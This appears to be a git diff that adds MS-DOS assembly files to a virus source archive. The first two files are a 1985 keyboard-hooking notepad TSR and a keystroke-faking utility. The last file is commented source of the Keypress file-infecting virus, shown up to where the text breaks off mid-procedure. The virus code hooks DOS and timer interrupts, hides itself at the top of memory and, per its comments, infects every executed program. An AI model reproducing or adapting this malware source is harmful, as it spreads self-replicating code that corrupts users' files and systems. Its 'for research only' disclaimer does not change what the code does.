DWORD + ORG 1CH*4 ;Timer Interrupt +TIMER_VECTOR LABEL DWORD +VECTORS ENDS + +SCREEN SEGMENT AT 0B000H ;A dummy segment to use as the +SCREEN ENDS ;Extra Segment + +ROM_BIOS_DATA SEGMENT AT 40H ;BIOS statuses held here, also keyboard buffer + + ORG 1AH + HEAD DW ? ;Unread chars go from Head to Tail + TAIL DW ? + BUFFER DW 16 DUP (?) ;The buffer itself + BUFFER_END LABEL WORD + +ROM_BIOS_DATA ENDS + +CODE_SEG SEGMENT + ASSUME CS:CODE_SEG + ORG 100H ;ORG = 100H to make this into a .COM file +FIRST: JMP LOAD_KEEPER ;First time through + + COPY_RIGHT DB '(C)1985 S.HOLZNER' ;Ascii autograph + PAD DB 20*102 DUP(0) ;Memory storage for pad + PAD_CURSOR DW 9*102 ;Current position in pad + ATTRIBUTE DB 112 ;Pad Attribute -- reverse video + LINE_ATTRIBUTE DB 240 ;Flashing Rev video + OLD_ATTRIBUTE DB 7 ;Original screen attrib: normal + PAD_OFFSET DW 0 ;Chooses 1st 250 bytes or 2nd + FIRST_POSITION DW ? ;Position of 1st char on screen + TRIGGER_FLAG DW 0 ;Trigger on or off + FULL_FLAG DB 0 ;Buffer Full Flag + LINE DW 9 ;Line number, 0-9 + SCREEN_SEG_OFFSET DW 0 ;0 for mono, 8000H for graphics + IO_CHAR DW ? ;Holds addr of Put or Get_Char + STATUS_PORT DW ? ;Video controller status port + OLD_KEYBOARD_INT DD ? ;Location of old kbd interrupt + FINISHED_FLAG DB 1 ;If not finished,f buffer + COMMAND_INDEX DW 1 ;Stores positior timer) + ROM_TIMER DD 1 ;The Timer interrupt's address + OLD_HEAD DW 0 + +KEEPER PROC NEAR ;The keyboard interrupt will now come here. + ASSUME CS:CODE_SEG + PUSH AX ;Save the used registers for good form + PUSH BX + PUSH CX + PUSH DX + PUSH DI + PUSH SI + PUSH DS + PUSH ES + PUSHF ;First, call old keyboard interrupt + CALL OLD_KEYBOARD_INT + ASSUME DS:ROM_BIOS_DATA ;Examine the char just put in + MOV BX,ROM_BIOS_DATA + MOV DS,BX + MOV BX,TAIL ;Point to current tail + CMP BX,HEAD ;If at head, kbd int has deleted char + JE BYE ;So leave + MOV DX,HEAD + SUB DX,2 ;Point to just read in character + CMP DX,OFFSET BUFFER ;Did we undershoot buffer? + JAE NOWRAP ;Nope + MOV DX,OFFSET BUFFER_END ;Yes -- move to buffer top + SUB DX,2 ;Compare two bytes back from head +NOWRAP: CMP DX,TAIL ;If it's the tail, buffer is full + JNE NOTFULL ;We're OK, jump to NotFull + CMP FULL_FLAG,1 ;Check if keyboard buffer full + JE BYE ;Yep, leave + MOV FULL_FLAG,1 ;Oops, full, set flag and take + JMP CHK ; this last character +NOTFULL:MOV FULL_FLAG,0 ;Always reset Full_Flag when buff clears +CHK: CMP TRIGGER_FLAG,0 ;Is the window on (triggered?) + JNE SUBT ;Yep, keep going + MOV DX,OLD_HEAD ;Check position of buffer head + CMP DX,HEAD + JNE CONT + MOV OLD_HEAD,0 +BYE: JMP OUT +CONT: MOV DX,HEAD + MOV OLD_HEAD,DX +SUBT: SUB BX,2 ;Point to just read in character + CMP BX,OFFSET BUFFER ;Did we undershoot buffer? + JAE NO_WRAP ;Nope + MOV BX,OFFSET BUFFER_END ;Yes -- move to buffer top + SUB BX,2 ; +NO_WRAP:MOV DX,[BX] ;Char in DX now + ;------ CHAR IN DX NOW ------- + CMP FINISHED_FLAG,0 + JE IN + CMP DX,310EH ;Default trigger is a ^N here. + JNE NOT_TRIGGER ;No + MOV TAIL,BX + NOT TRIGGER_FLAG ;Switch Modes + CMP TRIGGER_FLAG,0 ;Trigger off? + JNE TRIGGER_ON ;No, only other choice is on +TRIGGER_OFF: + MOV OLD_HEAD,0 ;Reset old head + MOV AH,OLD_ATTRIBUTE ;Get ready to restore screen + MOV ATTRIBUTE,AH ;Pad and blinking line set to orig. + MOV LINE_ATTRIBUTE,AH ; values + MOV PAD_OFFSET,10*102 ;Point to 2nd half of pad + LEA AX,PUT_CHAR ;Make IO call Put_Char as it scans + MOV IO_CHAR,AX ;over all locations in pad on screen + CALL IO ;Restore screen + CMP LINE,9 ;Was the window turned off without + JE IN ; using up-down keys? If so, exit + MOV AX,LINE ;No, there is a line to stuff in + MOV CL,102 ; keyboard buffer + MUL CL ;Find its location in Pad + MOV COMMAND_INDEX,AX ;And send to Put + CALL PUT ;Which will do actual stuffing +IN: JMP OUT ;Done +TRIGGER_ON: ;Window just turned on + MOV LINE,9 ;Set blinking line to bottom + MOV PAD_OFFSET,10*102 ;Point to screen storage part of pad + LEA AX,GET_CHAR ;Make IO use Get_char so current screen + MOV IO_CHAR,AX ;is stored + CALL IO ;Store Screen + CALL DISPLAY ;And put up the pad + JMP OUT ;Done here. +NOT_TRIGGER: + TEST TRIGGER_FLAG,1 ;Is Trigger on? + JZ RUBOUT_TEST + MOV TAIL,BX ;Yes, delete this char from buffer +UP: CMP DX,4800H ;An Up cursor key? + JNE DOWN ;No, try Down + DEC LINE ;Move blinker up one line + CMP LINE,0 ;At top? If so, reset + JGE NOT_TOP + MOV LINE,9 +NOT_TOP:CALL DISPLAY ;Display result + JMP OUT ;And leave +DOWN: CMP DX,5000H ;Perhaps Down cusor key pushed + JNE IN ;If not, ignore key + INC LINE ;If so, move down one + CMP LINE,9 ;If at bottom, wrap to top + JLE NOT_BOT + MOV LINE,0 +NOT_BOT:CALL DISPLAY ;Show results + JMP OUT ;And exit +RUBOUT_TEST: + CMP DX,0E08H ;Is it a Rubout? + JNE CHAR_TEST ;No -- try carriage return-line feed + MOV BX,PAD_CURSOR ;Yes -- get current pad location + CMP BX,9*102 ;Are we at beginning of last line? + JLE NEVER_MIND ;Yes -- can't rubout past beginning + SUB PAD_CURSOR,2 ;No, rubout this char + MOV PAD[BX-2],20H ;Move a space in instead (3920H) + MOV PAD[BX-1],39H +NEVER_MIND: + JMP OUT ;Done here. +CHAR_TEST: + CMP DL,13 ;Is this a carriage return? + JE PLUG ;If yes, plug this line into Pad + CMP DL,32 ;If this char < Ascii 32, delete line + JGE PLUG + MOV PAD_CURSOR,9*102 ;Clear the current line + MOV CX,51 + MOV BX,9*102 +CLEAR: MOV WORD PTR PAD[BX],0 + ADD BX,2 + LOOP CLEAR + JMP OUT ;And exit + +PLUG: MOV BX,PAD_CURSOR ;Get current pad location + CMP BX,10*102-2 ;Are we past the end of the pad? + JGE CRLF_TEST ;Yes -- throw away char + MOV WORD PTR PAD[BX],DX ;No -- move ASCII code into pad + ADD PAD_CURSOR,2 ;Increment pad location +CRLF_TEST: + CMP DX,1C0DH ;Is it a carriage return-line feed? + JNE OUT ;No -- put it in the pad + CALL CRLF ;Yes -- move everything up in pad +OUT: POP ES ;Having done Pushes, here are the Pops + POP DS + POP SI + POP DI + POP DX + POP CX + POP BX + POP AX + IRET ;An interrupt needs an IRET +KEEPER ENDP + +DISPLAY PROC NEAR ;Puts the whole pad on the screen + PUSH AX + MOV ATTRIBUTE,112 ;Use reverse video + MOV LINE_ATTRIBUTE,240 + MOV PAD_OFFSET,0 ;Use 1st 250 bytes of pad memory + LEA AX,PUT_CHAR ;Make IO use Put-Char so it does + MOV IO_CHAR,AX + CALL IO ;Put result on screen + POP AX + RET ;Leave +DISPLAY ENDP + +CRLF PROC NEAR ;This handles carriage returns + PUSH BX ;Push everything conceivable + PUSH CX + PUSH DI + PUSH SI + PUSH DS + PUSH ES + ASSUME DS:CODE_SEG ;Set DS to Code_Seg here + PUSH CS + POP DS + ASSUME ES:CODE_SEG ;And ES too + PUSH DS + POP ES + LEA DI,PAD ;Get ready to move contents of Pad + MOV SI,DI ; up one line + ADD SI,102 ;DI-top line, SI-one below top line + MOV CX,9*51 + MOV BX,PAD_CURSOR ;But first finish line with a 0 + CMP BX,9*102+2 ; as a flag letting Put know line is + JE POPS ; done. + MOV WORD PTR PAD[BX],0 +REP MOVSW ;Move up Pad contents + MOV CX,51 ;Now fill the last line with spaces + MOV AX,3920H +REP STOSW ;Using Stosw +POPS: MOV PAD_CURSOR,9*102 ;And finally reset Cursor to beginning + POP ES ; of the last line again. + POP DS + POP SI + POP DI + POP CX + POP BX +DONE: RET ;And out. +CRLF ENDP + +GET_CHAR PROC NEAR ;Gets a char from screen and advances position + ASSUME ES:SCREEN,DS:ROM_BIOS_DATA + PUSH DX + MOV SI,2 ;Loop twice, once for char, once for attribute + MOV DX,STATUS_PORT ;Get ready to read video controller status +G_WAIT_LOW: ;Start waiting for a new horizontal scan - + IN AL,DX ;Make sure the video controller scan status + TEST AL,1 ;is low + JNZ G_WAIT_LOW +G_WAIT_HIGH: ;After port has gone low, it must go high + IN AL,DX ;before it is safe to read directly from + TEST AL,1 ;the screen buffer in memory + JZ G_WAIT_HIGH + MOV AH,ES:[DI] ;Do the move from the screen, one byte at a time + INC DI ;Move to next screen location + DEC SI ;Decrement loop counter + CMP SI,0 ;Are we done? + JE LEAVE ;Yes + MOV PAD[BX],AH ;No -- put char we got into the pad + JMP G_WAIT_LOW ;Do it again +LEAVE: MOV OLD_ATTRIBUTE,AH + ADD BX,2 + POP DX + RET +GET_CHAR ENDP + +PUT_CHAR PROC NEAR ;Puts one char on screen and advances position + PUSH DX + MOV AH,PAD[BX] ;Get the char to be put onto the screen + CMP AH,32 + JAE GO + MOV AH,32 +GO: MOV SI,2 ;Loop twice, once for char, once for attribute + MOV DX,STATUS_PORT ;Get ready to read video controller status +P_WAIT_LOW: ;Start waiting for a new horizontal scan - + IN AL,DX ;Make sure the video controller scan status + TEST AL,1 ;is low + JNZ P_WAIT_LOW +P_WAIT_HIGH: ;After port has gone low, it must go high + IN AL,DX ;before it is safe to write directly to + TEST AL,1 ;the screen buffer in memory + JZ P_WAIT_HIGH + MOV ES:[DI],AH ;Move to screen, one byte at a time + MOV AH,ATTRIBUTE ;Load attribute byte for second pass + INC DI ;Point to next screen postion + DEC SI ;Decrement loop counter + JNZ P_WAIT_LOW ;If not zero, do it one more time + ADD BX,2 + POP DX + RET ;Exeunt +PUT_CHAR ENDP + +IO PROC NEAR ;This scans over all screen positions of the pad + ASSUME ES:SCREEN ;Use screen as extra segment + MOV BX,SCREEN + MOV ES,BX + + PUSH DS + MOV BX,ROM_BIOS_DATA + MOV DS,BX + MOV BX,4AH + MOV BX,DS:[BX] + SUB BX,51 + ADD BX,BX + MOV FIRST_POSITION,BX + POP DS + + MOV DI,SCREEN_SEG_OFFSET ;DI will be pointer to screen postion + ADD DI,FIRST_POSITION ;Add width of screen minus pad width + MOV BX,PAD_OFFSET ;BX will be pad location pointer + MOV CX,10 ;There will be 10 lines + +LINE_LOOP: + PUSH WORD PTR ATTRIBUTE + PUSH CX ;Figure out whether this is blinking + NEG CX ; line and if so, temporarily change + ADD CX,10 ; display attribute + CMP CX,LINE + JNE NOLINE + MOV CL,LINE_ATTRIBUTE + MOV ATTRIBUTE,CL +NOLINE: POP CX + MOV DX,51 ;And 51 spaces across +CHAR_LOOP: + CALL IO_CHAR ;Call Put-Char or Get-Char + DEC DX ;Decrement character loop counter + JNZ CHAR_LOOP ;If not zero, scan over next character + ADD DI,FIRST_POSITION ;Add width of screen minus pad width + + POP WORD PTR ATTRIBUTE + LOOP LINE_LOOP ;And now go back to do next line + RET ;Finished +IO ENDP + +PUT PROC NEAR ;Here it is. + ASSUME DS:ROM_BIOS_DATA ;Free DS + PUSH DS ;Save all used registers + PUSH SI + PUSH DI + PUSH DX + PUSH CX + PUSH BX + PUSH AX + MOV AX,ROM_BIOS_DATA ;Just to make sure + MOV DS,AX ;Set DS correctly +FIN: MOV FINISHED_FLAG,1 ;Assume we'll finish + MOV BX,TAIL ;Prepare to move to buffer's tail + MOV SI,COMMAND_INDEX ;Get our source index + +STUFF: MOV AX,WORD PTR PAD[SI] + ADD SI,2 ;Point to the command's next character + CMP AX,0 ;Is it a zero? (End of command) + JE NO_NEW_CHARACTERS ;Yes, leave with Finished_Flag=1 + MOV DX,BX ;Find position in buffer from BX + ADD DX,2 ;Move to next position for this word + CMP DX,OFFSET BUFFER_END ;Are we past the end? + JL NO_WRAP2 ;No, don't wrap + MOV DX,OFFSET BUFFER ;Wrap +NO_WRAP2: + CMP DX,HEAD ;Buffer full but not yet done? + JE BUFFER_FULL ;Time to leave, set Finished_Flag=0. + ADD COMMAND_INDEX,2 ;Move to next word in command + MOV [BX],AX ;Put it into the buffer right here. + ADD BX,2 ;Point to next space in buffer + CMP BX,OFFSET BUFFER_END ;Wrap here? + JL NO_WRAP3 ;No, readjust buffer tail + MOV BX,OFFSET BUFFER ;Yes, wrap +NO_WRAP3: + MOV TAIL,BX ;Reset buffer tail + JMP STUFF ;Back to stuff in another character. +BUFFER_FULL: ;If buffer is full, let timer take over + MOV FINISHED_FLAG,0 ; by setting Finished_Flag to 0. +NO_NEW_CHARACTERS: + POP AX ;Restore everything before departure. + POP BX + POP CX + POP DX + POP DI + POP SI + POP DS + STI + RET +PUT ENDP + + ASSUME DS:CODE_SEG +INTERCEPT_TIMER PROC NEAR ;This completes filling the buffer + PUSHF ;Store used flags + PUSH DS ;Save DS since we'll change it + PUSH CS ;Put current value of CS into DS + POP DS + CALL ROM_TIMER ;Make obligatory call + PUSHF + CMP FINISHED_FLAG,1 ;Do we have to do anything? + JE OUT1 ;No, leave + CLI ;Yes, start by clearing interrupts + PUSH DS ;Save these. + PUSH SI + PUSH DX + PUSH BX + PUSH AX + ASSUME DS:ROM_BIOS_DATA ;Point to the keyboard buffer again. + MOV AX,ROM_BIOS_DATA + MOV DS,AX + MOV BX,TAIL ;Prepare to put characters in at tail + MOV FINISHED_FLAG,1 ;Assume we'll finish + MOV SI,COMMAND_INDEX ;Find where we left ourselves + +STUFF2: MOV AX,WORD PTR PAD[SI] ;The same stuff loop as above. + ADD SI,2 ;Point to next command character. + CMP AX,0 ;Is it zero? (end of command) + JNE OVER ;No, continue. + JMP NO_NEW_CHARACTERS2 ;Yes, leave with Finished_Flag=1 +OVER: MOV DX,BX ;Find position in buffer from BX + ADD DX,2 ;Move to next position for this word + CMP DX,OFFSET BUFFER_END ;Are we past the end? + JL NO_WRAP4 ;No, don't wrap + MOV DX,OFFSET BUFFER ;Do the Wrap rap. +NO_WRAP4: + CMP DX,HEAD ;Buffer full but not yet done? + JE BUFFER_FULL2 ;Time to leave, come back later. + ADD COMMAND_INDEX,2 ;Point to next word of command. + MOV [BX],AX ;Put into buffer + ADD BX,2 ;Point to next space in buffer + CMP BX,OFFSET BUFFER_END ;Wrap here? + JL NO_WRAP5 ;No, readjust buffer tail + MOV BX,OFFSET BUFFER ;Yes, wrap +NO_WRAP5: + MOV TAIL,BX ;Reset buffer tail + JMP STUFF2 ;Back to stuff in another character +BUFFER_FULL2: + MOV FINISHED_FLAG,0 ;Set flag to not-done-yet. +NO_NEW_CHARACTERS2: + POP AX ;Restore these. + POP BX + POP DX + POP SI + POP DS +OUT1: POPF ;And Exit. + POP DS + IRET ;With customary IRET +INTERCEPT_TIMER ENDP + +LOAD_KEEPER PROC NEAR ;This procedure intializes everything + ASSUME DS:VECTORS ;The data segment will be the Interrupt area + MOV AX,VECTORS + MOV DS,AX + + MOV AX,KEYBOARD_INT ;Get the old interrupt service routine + MOV OLD_KEYBOARD_INT,AX ;address and put it into our location + MOV AX,KEYBOARD_INT[2] ;OLD_KEYBOARD_INT so we can call it. + MOV OLD_KEYBOARD_INT[2],AX + + MOV KEYBOARD_INT,OFFSET KEEPER ;Now load the address of our notepad + MOV KEYBOARD_INT[2],CS ;routine into the keyboard interrupt + + MOV AX,TIMER_VECTOR ;Now same for timer + MOV ROM_TIMER,AX + MOV AX,TIMER_VECTOR[2] + MOV ROM_TIMER[2],AX + + MOV TIMER_VECTOR,OFFSET INTERCEPT_TIMER + MOV TIMER_VECTOR[2],CS ;And intercept that too. + + ASSUME DS:ROM_BIOS_DATA + MOV AX,ROM_BIOS_DATA + MOV DS,AX + MOV BX,OFFSET BUFFER ;Clear the keyboard buffer. + MOV HEAD,BX + MOV TAIL,BX + MOV AH,15 ;Ask for service 15 of INT 10H + INT 10H ;This tells us how display is set up + MOV STATUS_PORT,03BAH ;Assume this is a monochrome display + TEST AL,4 ;Is it? + JNZ EXIT ;Yes - jump out + MOV SCREEN_SEG_OFFSET,8000H ;No - set up for graphics display + MOV STATUS_PORT,03DAH + +EXIT: MOV DX,OFFSET LOAD_KEEPER ;Set up everything but LOAD_PAD to + INT 27H ;stay and attach itself to DOS +LOAD_KEEPER ENDP + + CODE_SEG ENDS + + END FIRST ;END "FIRST" so 8088 will go to FIRST first. + + + diff --git a/MSDOS/Virus.MSDOS.Unknown.key-fake.asm b/MSDOS/Virus.MSDOS.Unknown.key-fake.asm new file mode 100644 index 00000000..ddce0316 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.key-fake.asm @@ -0,0 +1,247 @@ +; KEY-FAKE.ASM -- Fakes keystrokes from internal keyboard buffer. +; ============ + +CSEG Segment + Assume CS:CSEG + Org 0100h +Entry: Jmp Initialize + +; Most Resident Data +; ------------------ + + db 'KEY-FAKE (C) Copyright Charles Petzold, 1985' +SearchLabelEnd Label Byte + +OldInterrupt16 dd 0 +Pointer dw Offset KeyStrokeBuffer +Counter db 0 + +; New Interrupt 16 (Keyboard) +; --------------------------- + +NewInterrupt16 Proc Far + + Sti ; Allow futher interrupts + Cmp CS:[Counter],0 ; See if characters in buffer + Jz DoOldInterrupt ; If not, just do regular interrupt + + Or AH,AH ; Check if AH is zero + Jz GetCharacter ; If so, call is to get character + + Cmp AH,1 ; Check if AH is one + Jz GetStatus ; If so, call is for status + +DoOldInterrupt: Jmp CS:[OldInterrupt16] ; Otherwise, go away + +GetCharacter: Push BX + Mov BX,CS:[Pointer] ; BX points to current buffer position + Mov AX,CS:[BX] ; Get ASCII code and scan code + Inc BX ; Move buffer pointer ahead + Inc BX + Mov CS:[Pointer],BX ; Save new pointer + Dec CS:[Counter] ; One less character in counter + Pop BX + + Or AX,AX ; See if 0 returned + Jz NewInterrupt16 ; If so, take it from the top again + + IRet ; Return to calling program + +GetStatus: Push BX + Mov BX,CS:[Pointer] ; BX points to current buffer position + Mov AX,CS:[BX] ; Get ASCII code and scan code + Pop BX + + Or AX,AX ; See if special 0 keystroke + Jnz StatusReturn ; If not, return non-zero flag + + Add CS:[Pointer],2 ; If so, skip over it + Dec CS:[Counter] ; One less character + Or AX,AX ; Will set zero flag + +StatusReturn: Ret 2 ; Do not pop flags + +NewInterrupt16 EndP + +; Beginning of Key Stroke Buffer +; ------------------------------ + +KeyStrokeBuffer Label Byte ; 256 Byte Buffer for keystrokes + +; Initialization -- Search through Memory and see if label matches +; ---------------------------------------------------------------- +; +; If so, use the loaded program; if not, create a new interrupt + + Assume DS:CSEG, ES:CSEG, SS:CSEG + +Initialize: Mov Word Ptr [Entry],0 ; Slightly modify search label + Mov Byte Ptr [Entry + 2],0 ; so no false matches + + Cld + Mov DX,CS ; This segment + Sub AX,AX ; Beginning of search + Mov ES,AX ; Search segment + +SearchLoop: Mov SI,100h ; Address to search + Mov DI,SI ; Set pointers to same address + Mov CX,Offset SearchLabelEnd - Offset Entry + Repz Cmpsb ; Check for match + Jz ReadyForDecode ; If label matches + + Inc AX ; Still the search segment + Mov ES,AX ; ES to next segment + + Cmp AX,DX ; Check if it's this segment + Jnz SearchLoop ; Try another compare + + Mov Byte Ptr DS:[1],27h ; Since no match found, + ; set up PSP for Terminate & + ; remain resident. + +; Save and Set Interupt 16 if Staying Resident +; -------------------------------------------- + + Sub AX,AX ; Set AX to zero + Mov DS,AX ; To access vector segment + Assume DS:Nothing ; Tell the assembler + + Mov AX,Word Ptr DS:[16h * 4] ; Get vector offset + Mov Word Ptr CS:[OldInterrupt16],AX ; Save it + Mov AX,Word Ptr DS:[16h * 4 + 2] ; Get vector segment + Mov Word Ptr CS:[OldInterrupt16 + 2],AX ; and save it + + Cli ; Don't interrupt me + Mov DS:[16h * 4],Offset NewInterrupt16 ; Store new + Mov DS:[16h * 4 + 2],CS ; address + Sti ; Now you can talk + + Push CS + Pop DS ; Restore DS + Assume DS:CSEG + +; Parameter decoding when program segment has been found +; ------------------------------------------------------ +; +; ES = segment of loaded program (could be CS) + +ReadyForDecode: Mov SI,80h ; SI points to parameter area + Mov DI,Offset KeyStrokeBuffer + Mov ES:[Pointer],DI ; ES:DI points to buffer area + Mov ES:[Counter],0 ; Set keystroke counter to zero + + Lodsb ; Get parameter count + Cbw ; Convert to word + Mov CX,AX ; CX = parameter count + Inc CX ; So catch last delimiter (0D) + Or AX,AX ; Check if parameter present + Jnz GoDecodeLoop ; If so, continue + Jmp EndDecode ; If not, cut out + +GoDecodeLoop: Jmp DecodeLoop + +; End of Residence is end of Key Stroke Buffer +; -------------------------------------------- + + Org 256 + Offset KeyStrokeBuffer + +EndResidence Label Byte + +; Data for Parameter Decoding +; --------------------------- + +QuoteSign db 0 ; Flag for quoted strings +DoingNumber db 0 ; Flag for doing a number +DoingExtended db 0 ; Flag for doing extended ASCII +CalcNumber db 0 ; A calculated number +Ten db 10 ; For MUL convenience + +; Routine for doing quoted text +; ----------------------------- + +DecodeLoop: Lodsb ; Get character + Cmp [QuoteSign],0 ; Check if doing quoted text + Jz NotDoingQuote ; If not, continue checks + + Cmp AL,[QuoteSign] ; Check first if character is quote + Jz EndQuote ; If so, finish quoted text + + Sub AH,AH ; Set scan code to zero + Stosw ; Save it in buffer + Inc ES:[Counter] ; One more character + Jmp DoNextCharacter ; Go to bottom of routine + +EndQuote: Mov [QuoteSign],0 ; End of quoted text + Jmp DoNextCharacter ; Get the next character + +; Routine for Extended Ascii Character (@) +; ---------------------------------------- + +NotDoingQuote: Cmp AL,'@' ; See if character is for extended + Jnz NotExtended ; If not, hop over a little code + + Mov [DoingExtended],1 ; Flag for extended ASCII + Jmp Delimiter ; To possibly dump number + +; Routine for Quote Sign ' or " +; ----------------------------- + +NotExtended: Cmp AL,'"' ; Check for a double quote sign + Jz Quote + Cmp AL,"'" ; Check for a single quote sign + Jnz NotAQuote + +Quote: Mov [QuoteSign],AL ; Save the quote sign + Jmp Delimiter ; To possibly dump number + +; Routine for decimal number +; -------------------------- + +NotAQuote: Cmp AL,'0' ; See if character >= 0 + Jb Delimiter + Cmp AL,'9' ; See if character <= 9 + Ja Delimiter + + Mov [DoingNumber],1 ; If so, doing number + + Sub AL,'0' ; Convert to binary + Xchg AL,[CalcNumber] ; Get previously calculated + Mul [Ten] ; Multiply by 10 + Add [CalcNumber],AL ; Add it to new digit + + Jmp DoNextCharacter ; And continue + +; Anything else is considered a delimiter +; --------------------------------------- + +Delimiter: Cmp [DoingNumber],1 ; Check if doing a number + Jnz DoNextCharacter ; If not, do not dump + + Mov AL,[CalcNumber] ; Set AX to ASCII number + Sub AH,AH ; Zero out scan code part + Cmp [DoingExtended],1 ; Check if doing scan code + Jnz NumberOK + + Xchg AL,AH ; Switch ASCII and scan code + +NumberOK: Stosw ; Store the two codes + Inc ES:[Counter] ; One more character in buffer + + Mov [DoingNumber],0 ; Clear out all flags + Mov [DoingExtended],0 + Mov [CalcNumber],0 + +DoNextCharacter:Dec CX ; One less character to do + Jz EndDecode ; If no more, we're done + Jmp DecodeLoop ; Otherwise, get next one + +; End Decode -- Ready to terminate (and possibly stay resident) +; ------------------------------------------------------------- + +EndDecode: Mov DX,Offset EndResidence ; End of resident part + Ret ; Int 20h or 27h + +CSEG EndS + + End Entry + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.keypress.asm b/MSDOS/Virus.MSDOS.Unknown.keypress.asm new file mode 100644 index 00000000..dfa93406 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.keypress.asm @@ -0,0 +1,739 @@ +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; +;******************************************************** +; Source code of the Keypress Virus - Made by XSTC +; Made in A86 v3.07 +; +; The Keypress Virus installs itself in top of DOS +; memory, without using DOS resident functions. It will +; hook int 1Ch (timer) and 21h (DOS) and will copy every +; 10 minutes during 2 seconds the keys you press five +; times (so if you press '1' it will be '111111') - if +; you press no key, it will usually give ESCs. +; +; In DOS 3+ it spreads to every file executed - so it +; can, besides COM/EXE, infect DRV/OVL/etc. +; It also spreads itself in DOS 1 and 2 with a special +; routine - in this case only COM/EXE files will be +; infected. +; +; It adds, after making full paragraphs of the file +; length, 1232 bytes to COM-files and 1216 to EXE. +; +; This code is only made to show the possibilities and +; dangers of a virus. It is only intended for research +; purposes - spreading a virus is prohibited by law. +; +; NOTE - The compiled code is not 100% compatible with +; the Keypress virus. A86 compiles the 'ADD BX,AX' and +; 'MOV DI,SI' different. This has totally no effect +; on the program. +;******************************************************** + +; After compiling the new virus, enter the new size in paragraphs in VirParSize +; and compile again. + +VirParSize equ 4Ch ; Size of the original KeyPress virus + +VirStart: jmp long VirBegin + db 0 + +ComStart: mov bx,cs ; When the virus has infected a .COM file, + add bx,[102h] ; this is the jump to the virus. Actually, + push bx ; this code is overwritten with the code + mov bx,offset VirBegin ; in the end of the virus. + push bx + retf + +EB02 dw 02EBh ; 'jmp 104' - first 2 bytes in .COM file + +VirSize dw VirParSize shl 4 ; Size of virus in whole pars + +VirPars dw VirParSize + 1 ; Size of virus in pars+1 + +MaxComSize dw 0FF00h-VirParSize ; Max. size .COM file to infect (100h stack) + +Com_or_exe db 00h ; 0 = Com-File, 1 = Exe-File +R_Ax dw (?) +R_Bx dw (?) +R_Cx dw (?) +R_Dx dw (?) +R_Di dw (?) +R_Si dw (?) +R_Bp dw (?) +R_Es dw (?) +R_Ds dw (?) +R_SS dw (?) +R_SP dw (?) + +Exe_CS dw (?) +Exe_IP dw (?) + + +VirBegin: call Save_Regs ; Start of virus + call Fix_cs_ss ; Fix CS and SS of orig. prog (for .EXE files) + call Get_cs_ip ; Get CS and IP of original prog + call Check_res ; Check virus already resident + jb Exit_inst ; Yes, quit + + call Inst_mem ; Install in memory + jb Exit_inst ; Error, quit + + call Inst_ints ; Hook interrupts +Exit_Inst: jmp short Rst_regs_prg + nop + +Jmp_Prg: db 0EAh ; Jump to original program +PrgOfs dw (?) +PrgSeg dw (?) + +Check_res: push ds + xor bx,bx + mov ds,bx + mov bx,600h ; Unused word in memory + cmp word ptr [bx],1 ; Already installed? + jz Installed ; Yes + + mov word ptr [bx],1 ; No + stc + +Installed: cmc + pop ds + ret + + +;*** For .EXE: Fix orig-prog CS and SS *** + +Fix_cs_ss: test byte ptr [Com_or_exe],1 + jz no_exe + + mov ax,es + add ax,10h + add Exe_cs,ax + add R_ss,ax + +No_Exe: ret + + +;*** Get CS + IP of orig. program, and for .COM: Restore first 16 bytes *** + +Get_cs_ip: mov ax,[Exe_cs] + mov bx,[Exe_ip] + test byte ptr [Com_or_exe],1 + jnz No_rest ; .EXE file: no restore of first bytes + + mov ax,es + mov bx,100h + mov cx,10h + mov si,offset First_bytes + mov di,100h + cld + repz ; Restore first 16 bytes (.COM file) + movsb + +No_rest: mov [Prgseg],ax + mov [Prgofs],bx + ret + + +;*** Proc: Save the registers to restore them after the virus has ended *** + +Save_Regs: mov cs:R_ds,ds + push cs + pop ds + mov R_ax,ax + mov R_bx,bx + mov R_cx,cx + mov R_dx,dx + mov R_di,di + mov R_si,si + mov R_bp,bp + mov R_es,es + ret + + +;*** Restore regs for original program *** + +Rst_regs_prg: mov ax,R_ax + mov bx,R_bx + mov cx,R_cx + mov dx,R_dx + mov bp,R_bp + mov di,R_di + mov si,R_si + mov es,R_es + test byte ptr [Com_or_exe],1 + jz No_StackRest ; No stack restore for .COM files + + cli + mov ss,[R_ss] ; Restore .EXE stack + mov sp,[R_sp] + sti + +No_StackRest: mov ds,R_ds + jmp short jmp_prg + + +;*** Restore regs for interrupts *** + +Rst_regs_int: mov ax,R_ax + mov bx,R_bx + mov cx,R_cx + mov dx,R_dx + mov bp,R_bp + mov di,R_di + mov si,R_si + mov es,R_es + mov ds,R_ds + ret + + +;*** Proc: Search for last MCB *** + +Last_MCB: push ds + mov bx,es + dec bx + +Next_MCB: mov ds,bx + cmp byte ptr [0],5Ah ; Last MCB? + jz Is_last ; Yes + inc bx + add bx,[3] ; Go to next + cmp bx,0A000h ; In ROM? + jb Next_MCB ; No, try next one + +Is_Last: pop ds + ret + + +;*** Proc: Install virus in end of memory *** + +Inst_Mem: call Last_mcb ; Search last MCB + cmp bx,0A000h ; In ROM? + jb Not_ROM ; No, continue + +No_Inst: push cs ; Yes, quit + pop ds + stc ; Error, virus not installed + ret + +Not_ROM: mov ds,bx + mov ax,[3] ; AX = Size last MCB + sub ax,cs:[VirPars] ; - (Virussize in pars+1) + jbe no_inst ; Not enough memory, quit + cmp ax,800h + jb no_inst ; Less than 2048 pars free, quit + mov [3],ax ; Give program less space to install virus + add bx,ax + inc bx ; BX = seg where virus comes + mov es:[2],bx ; Enter in PSP, program not allowed there + sub bx,10h ; - 10h pars (virus starts at 100h) + push bx + push cs + pop ds + pop es + mov si,100h + 